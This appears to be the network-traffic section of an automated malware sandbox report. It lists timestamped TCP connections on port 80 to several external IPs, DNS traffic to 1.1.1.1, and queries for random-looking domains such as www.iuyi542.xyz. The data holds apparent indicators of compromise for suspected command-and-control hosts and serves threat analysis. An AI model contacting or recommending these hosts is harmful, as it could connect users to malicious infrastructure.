Nov 5, 2024 07:12:33.583937883 CET	49917	80	192.168.2.4	154.23.184.95
Nov 5, 2024 07:12:33.588850975 CET	80	49917	154.23.184.95	192.168.2.4
Nov 5, 2024 07:12:38.641499996 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:38.646729946 CET	80	49953	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:38.648691893 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:38.659462929 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:38.664340019 CET	80	49953	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:39.782561064 CET	80	49953	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:39.782696962 CET	80	49953	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:39.782752037 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:39.784358025 CET	80	49953	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:39.784404993 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:40.170207024 CET	49953	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:41.191792965 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:41.196789980 CET	80	49968	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:41.199635983 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:41.212157965 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:41.218358040 CET	80	49968	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:42.367645979 CET	80	49968	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:42.367664099 CET	80	49968	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:42.367794037 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:42.368691921 CET	80	49968	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:42.368747950 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:42.719521046 CET	49968	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:43.736665010 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:43.741509914 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.741595030 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:43.754673004 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:43.761790037 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761800051 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761807919 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761811972 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761821032 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761827946 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761836052 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761843920 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:43.761851072 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:44.910484076 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:44.910964966 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:44.911024094 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:44.912445068 CET	80	49983	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:44.912789106 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:45.264022112 CET	49983	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:46.284734964 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:46.289601088 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:46.289658070 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:46.306076050 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:46.310908079 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426223040 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426237106 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426246881 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426364899 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426374912 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.426397085 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:47.426426888 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:47.428740978 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:47.429543972 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:47.433507919 CET	49995	80	192.168.2.4	172.67.185.22
Nov 5, 2024 07:12:47.438277006 CET	80	49995	172.67.185.22	192.168.2.4
Nov 5, 2024 07:12:53.003526926 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:53.008799076 CET	80	50020	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:53.008869886 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:53.019594908 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:53.024497032 CET	80	50020	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:53.960299015 CET	80	50020	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:54.084875107 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:54.135435104 CET	80	50020	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:54.135479927 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:54.532867908 CET	50020	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:55.549107075 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:55.554085970 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:55.554160118 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:55.572288036 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:55.577615023 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.076479912 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:57.108680964 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.108710051 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.108786106 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:57.108786106 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:57.108828068 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.108838081 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.108882904 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:57.108882904 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:57.109690905 CET	80	50021	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:57.109785080 CET	50021	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:58.095449924 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:58.101084948 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.101151943 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:58.113195896 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:58.118227005 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118271112 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118280888 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118290901 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118302107 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118345022 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118355036 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118364096 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:58.118372917 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:59.086447954 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:59.141530037 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:59.266382933 CET	80	50022	206.119.82.172	192.168.2.4
Nov 5, 2024 07:12:59.269551039 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:12:59.623445988 CET	50022	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:00.645546913 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:00.650561094 CET	80	50023	206.119.82.172	192.168.2.4
Nov 5, 2024 07:13:00.653640985 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:00.660121918 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:00.665019035 CET	80	50023	206.119.82.172	192.168.2.4
Nov 5, 2024 07:13:01.603915930 CET	80	50023	206.119.82.172	192.168.2.4
Nov 5, 2024 07:13:01.654566050 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:01.779105902 CET	80	50023	206.119.82.172	192.168.2.4
Nov 5, 2024 07:13:01.779187918 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:01.780448914 CET	50023	80	192.168.2.4	206.119.82.172
Nov 5, 2024 07:13:01.785267115 CET	80	50023	206.119.82.172	192.168.2.4
Nov 5, 2024 07:13:15.662169933 CET	50024	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:15.667746067 CET	80	50024	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:15.667809010 CET	50024	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:15.679636955 CET	50024	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:15.684578896 CET	80	50024	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:17.185898066 CET	50024	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:17.191457033 CET	80	50024	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:17.191535950 CET	50024	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:18.204777956 CET	50025	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:18.209796906 CET	80	50025	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:18.209866047 CET	50025	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:18.223305941 CET	50025	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:18.228179932 CET	80	50025	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:19.732897997 CET	50025	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:19.738367081 CET	80	50025	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:19.738440037 CET	50025	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:20.754900932 CET	50026	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:20.759792089 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.759913921 CET	50026	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:20.775448084 CET	50026	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:20.780298948 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780386925 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780396938 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780405998 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780416965 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780464888 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780473948 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780510902 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:20.780531883 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:22.279673100 CET	50026	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:22.285451889 CET	80	50026	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:22.285571098 CET	50026	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:23.299606085 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:23.304601908 CET	80	50027	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:23.304750919 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:23.311908960 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:23.316705942 CET	80	50027	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:26.220922947 CET	80	50027	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:26.310864925 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:26.481463909 CET	80	50027	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:26.481553078 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:26.482639074 CET	50027	80	192.168.2.4	103.191.208.137
Nov 5, 2024 07:13:26.489203930 CET	80	50027	103.191.208.137	192.168.2.4
Nov 5, 2024 07:13:31.529592037 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:31.788079977 CET	80	50028	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:31.788146019 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:31.798866987 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:31.803761959 CET	80	50028	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:32.872278929 CET	80	50028	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:32.923724890 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:33.104425907 CET	80	50028	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:33.107938051 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:33.313591003 CET	50028	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:34.330368042 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:34.336596012 CET	80	50029	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:34.336662054 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:34.349190950 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:34.354743958 CET	80	50029	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:35.409229040 CET	80	50029	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:35.451522112 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:35.642100096 CET	80	50029	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:35.642157078 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:35.857831955 CET	50029	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:36.876041889 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:36.881216049 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.881318092 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:36.892261982 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:36.897181034 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897217989 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897254944 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897267103 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897331953 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897345066 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897357941 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897526026 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:36.897538900 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:37.975743055 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:38.029659033 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:38.207880020 CET	80	50030	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:38.207950115 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:38.413193941 CET	50030	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:39.423224926 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:39.428535938 CET	80	50031	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:39.428788900 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:39.436156034 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:39.441713095 CET	80	50031	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:40.522814035 CET	80	50031	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:40.576549053 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:40.755358934 CET	80	50031	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:40.758469105 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:40.758470058 CET	50031	80	192.168.2.4	3.111.160.216
Nov 5, 2024 07:13:40.763268948 CET	80	50031	3.111.160.216	192.168.2.4
Nov 5, 2024 07:13:46.010685921 CET	50032	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:46.015655041 CET	80	50032	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:46.015717983 CET	50032	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:46.031358004 CET	50032	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:46.037075043 CET	80	50032	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:46.727004051 CET	80	50032	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:46.767584085 CET	80	50032	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:46.767904997 CET	50032	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:47.545350075 CET	50032	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:48.563844919 CET	50033	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:48.568728924 CET	80	50033	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:48.568816900 CET	50033	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:48.577876091 CET	50033	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:48.582747936 CET	80	50033	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:49.265006065 CET	80	50033	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:49.289885044 CET	80	50033	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:49.293654919 CET	50033	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:50.092220068 CET	50033	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:51.116261005 CET	50034	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:51.121455908 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.121622086 CET	50034	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:51.131966114 CET	50034	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:51.136996031 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137022972 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137037992 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137049913 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137155056 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137176037 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137188911 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137201071 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.137212992 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.857953072 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.896439075 CET	80	50034	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:51.896491051 CET	50034	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:52.639208078 CET	50034	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:53.658507109 CET	50035	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:53.663520098 CET	80	50035	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:53.663599014 CET	50035	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:53.672677994 CET	50035	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:53.677479982 CET	80	50035	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:54.352780104 CET	80	50035	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:54.391330957 CET	80	50035	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:54.391410112 CET	50035	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:54.404207945 CET	50035	80	192.168.2.4	203.161.49.193
Nov 5, 2024 07:13:54.409965038 CET	80	50035	203.161.49.193	192.168.2.4
Nov 5, 2024 07:13:59.509649038 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:13:59.514569044 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:13:59.514689922 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:13:59.525758982 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:13:59.531244040 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.218991995 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219017982 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219034910 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219053030 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219060898 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:00.219069004 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219088078 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219090939 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:00.219105005 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219121933 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.219125986 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:00.219158888 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:00.221546888 CET	80	50036	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:00.221591949 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:01.029791117 CET	50036	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.048943996 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.054101944 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.054174900 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.066782951 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.071696997 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740293980 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740345001 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740395069 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740428925 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740464926 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740499020 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740535975 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.740578890 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.741306067 CET	80	50037	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:02.741341114 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:02.745647907 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:03.576711893 CET	50037	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:04.604943991 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:04.610208988 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.610295057 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:04.620795012 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:04.625756979 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625788927 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625817060 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625866890 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625895023 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625946045 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.625972986 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.626164913 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:04.626192093 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301202059 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301222086 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301232100 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301244020 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301254988 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301270962 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301284075 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.301302910 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:05.301302910 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:05.302778959 CET	80	50038	188.114.97.3	192.168.2.4
Nov 5, 2024 07:14:05.302867889 CET	50038	80	192.168.2.4	188.114.97.3
Nov 5, 2024 07:14:06.451637983 CET	50038	80	192.168.2.4	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 07:11:39.646481037 CET	57246	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:11:39.690196037 CET	53	57246	1.1.1.1	192.168.2.4
Nov 5, 2024 07:11:56.548182011 CET	57043	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:11:56.561456919 CET	53	57043	1.1.1.1	192.168.2.4
Nov 5, 2024 07:12:10.767103910 CET	56848	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:12:10.778795004 CET	53	56848	1.1.1.1	192.168.2.4
Nov 5, 2024 07:12:24.345316887 CET	60358	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:12:24.757232904 CET	53	60358	1.1.1.1	192.168.2.4
Nov 5, 2024 07:12:38.596138954 CET	52314	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:12:38.636172056 CET	53	52314	1.1.1.1	192.168.2.4
Nov 5, 2024 07:12:52.439989090 CET	57898	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:12:53.001337051 CET	53	57898	1.1.1.1	192.168.2.4
Nov 5, 2024 07:13:06.801549911 CET	61237	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:13:06.825634956 CET	53	61237	1.1.1.1	192.168.2.4
Nov 5, 2024 07:13:14.915222883 CET	56340	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:13:15.659439087 CET	53	56340	1.1.1.1	192.168.2.4
Nov 5, 2024 07:13:31.486118078 CET	53111	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:13:31.524418116 CET	53	53111	1.1.1.1	192.168.2.4
Nov 5, 2024 07:13:45.767937899 CET	53696	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:13:46.007867098 CET	53	53696	1.1.1.1	192.168.2.4
Nov 5, 2024 07:13:59.408135891 CET	49843	53	192.168.2.4	1.1.1.1
Nov 5, 2024 07:13:59.505474091 CET	53	49843	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 5, 2024 07:11:39.646481037 CET	192.168.2.4	1.1.1.1	0xf22d	Standard query (0)	www.iuyi542.xyz	A (IP address)	IN (0x0001)	false
Nov 5, 2024 07:11:56.548182011 CET	192.168.2.4	1.1.1.1	0xb06f	Standard query (0)	www.vrxlzluy.shop	A (IP address)	IN (0x0001)	false
